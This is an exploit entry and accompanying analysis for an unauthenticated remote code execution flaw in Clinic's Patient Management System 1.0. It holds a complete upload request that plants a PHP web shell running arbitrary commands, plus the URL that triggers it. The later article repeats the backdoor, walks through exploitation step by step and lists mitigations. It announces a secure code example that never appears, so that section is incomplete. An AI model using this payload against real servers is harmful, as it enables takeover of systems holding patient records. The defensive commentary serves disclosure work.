Clinic's Patient Management System 1.0 - Unauthenticated RCE

Exploit Author: Oğulcan Hami Gül Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2024-02-05

# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
# Date: 07.10.2023
# Exploit Author: Oğulcan Hami Gül
# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
# Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10

## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.

POST /pms/users.php HTTP/1.1

Host: 192.168.1.36

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367

Content-Length: 1054

Origin: http://192.168.1.36

Connection: close

Referer: http://192.168.1.36/pms/users.php

Upgrade-Insecure-Requests: 1



-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="display_name"



sefa7

-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="user_name"



sefa7

-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="password"



sefa7

-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php"

Content-Type: application/x-php



<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->


-----------------------------421755697017784551042596452367

Content-Disposition: form-data; name="save_user"





-----------------------------421755697017784551042596452367--


## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication.

## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server.

Exploiting Unauthenticated Remote Code Execution in Clinic's Patient Management System 1.0

Security vulnerabilities in healthcare software can have far-reaching consequences, especially when they allow attackers to execute arbitrary code without authentication. One such critical flaw was discovered in Clinic's Patient Management System 1.0, a widely distributed PHP-based application hosted on sourcecodester.com. This system, marketed as a free open-source solution for managing patient records, contains a severe unauthenticated Remote Code Execution (RCE) vulnerability that enables attackers to upload malicious PHP files and gain full control over the server.

Understanding the Vulnerability

The core issue lies in the /pms/users.php endpoint, which allows unauthenticated users to upload profile pictures. While intended for image uploads, the application fails to properly validate file types and lacks input sanitization. This oversight enables attackers to upload files with a .php extension, bypassing security checks.

Here is the malicious payload used in the exploit:


<?php
if(isset($_REQUEST['cmd'])){
    echo "";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo ""; die;
}
?>

This simple backdoor script listens for a cmd parameter in the HTTP request. When invoked, it executes the provided command using the system() function, returning the output in a formatted block. This allows remote execution of shell commands such as whoami, ls, or even cat /etc/passwd.

Exploit Workflow: Step-by-Step

Attackers follow a straightforward process to exploit this vulnerability:

Access the endpoint: The attacker visits http://192.168.1.36/pms/users.php without any login credentials.
Send malicious file upload: Using a multipart/form-data POST request, the attacker uploads a file named simple-backdoor.php with a Content-Type: application/x-php header.
Server-side behavior: The application appends a random timestamp (e.g., 1696676940) to the filename, resulting in 1696676940simple-backdoor.php stored in the /pms/user_images/ directory.
Execute the payload: The attacker accesses the uploaded file via http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami, triggering the backdoor.

Why This is Critical

Unlike typical vulnerabilities that require authentication or specific user privileges, this RCE is unauthenticated. This means:

Any internet-facing user can exploit the flaw.
Attackers can gain full server access without needing credentials.
Malicious scripts can persist indefinitely, enabling long-term access.
Compromised systems can be used as pivot points for further attacks.

For a clinic’s patient management system, this is especially dangerous. Unauthorized access to patient data, system configuration files, or even the ability to manipulate records could lead to data breaches, ransomware deployment, or denial-of-service attacks.

Technical Root Causes

The vulnerability stems from poor file validation and improper handling of file uploads. Key failures include:

Issue	Explanation
Missing MIME type validation	Accepting `application/x-php` as a valid file type despite being a script.
Insufficient file extension checks	Allowing `.php` extensions without filtering or sanitization.
Dynamic file naming without security	Appending random numbers to filenames, but not restricting execution paths.
Use of `system()` with user input	Direct execution of user-supplied commands without escaping or sandboxing.

Security Best Practices for Developers

Developers of web applications—especially in sensitive domains like healthcare—must implement strict security controls. Here are essential mitigations:

File type restriction: Only allow image formats (e.g., .jpg, .png) and reject .php, .exe, or .sh extensions.
Content-type verification: Validate MIME types against known safe types using server-side checks.
File storage isolation: Store uploaded files in non-executable directories (e.g., /uploads), and disable PHP execution in those paths.
Input sanitization: Never pass user input directly to functions like system(). Use whitelisted commands or command wrappers.
Authentication requirement: Restrict file upload endpoints to authenticated users only.

Improved Secure Code Example

Here is a corrected version of the file upload handler with security safeguards:

This improved version:

Checks MIME type and file extension.
Uses uniqid() to prevent predictable filenames.
Stores files in a dedicated, non-executable directory.
Prevents any direct execution of uploaded scripts.

Conclusion

The Clinic's Patient Management System 1.0 vulnerability serves as a stark reminder that open-source software, even when free and widely available, must be scrutinized for security flaws. The combination of unauthenticated access, weak file validation, and dangerous function usage creates a perfect storm for remote code execution.

Organizations using such systems should immediately patch or replace them. Developers must prioritize secure coding practices—especially in sensitive sectors like healthcare—to prevent exploitation by malicious actors. In today’s threat landscape, a single vulnerability can compromise patient privacy, operational integrity, and even national health infrastructure.